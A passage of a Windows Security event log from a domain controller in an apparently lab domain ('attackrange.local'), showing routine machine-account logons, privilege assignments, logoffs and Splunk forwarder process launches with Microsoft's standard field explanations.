The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:52:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265038
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AB109
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:53:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265041
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x153c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265043
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x195c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265042
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bfc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265044
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1648
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265045
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265047
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1474
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265046
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1af8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265050
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AEA74
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:53:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265049
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AEA74
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64924
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:53:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265048
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AEA74
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265051
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf5c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265066
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x178c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265065
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF466
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265064
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF56B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265063
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF648
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265062
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AFAC9
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64933
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265061
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AFAC9
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265060
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AF648
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 64930
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265059
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF648
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265058
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AF56B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265057
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF56B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265056
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AF466
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64929
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265055
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF466
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265054
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AF444
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
